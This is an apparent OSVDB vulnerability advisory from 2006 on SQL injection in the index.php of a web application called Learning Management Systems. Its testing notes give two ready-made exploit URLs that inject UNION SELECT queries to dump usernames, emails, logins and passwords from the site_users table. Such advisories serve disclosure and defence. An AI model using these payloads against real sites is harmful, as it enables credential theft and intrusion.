Learning Management Systems (LMS) index.php Multiple Variable SQL Injection

2006-09-28T01:49:34
ID OSVDB:29688
Type osvdb
Reporter Kernel-32(kernel-32@linuxmail.org)
Modified 2006-09-28T01:49:34

Description

Manual Testing Notes

http://[target]/path/ index.php?sub=students&action=edit&user_id=8888'UNION SELECT user_id, user_name, user_email, user_login, user_password, user_level, user_number, student_class FROM site_users/*

http://[target]/path/ index.php?sub=messages&action=det&msg_id=8888'UNION SELECT user_id, user_name, user_email, user_login, user_password, user_level, user_number, student_class FROM site_users WHERE user_id=6/*

References:

Vendor URL: http://learning-management-system.info/ Other Advisory URL: http://kernel-32.blogspot.com/2006/09/lms-112-sql-injection.html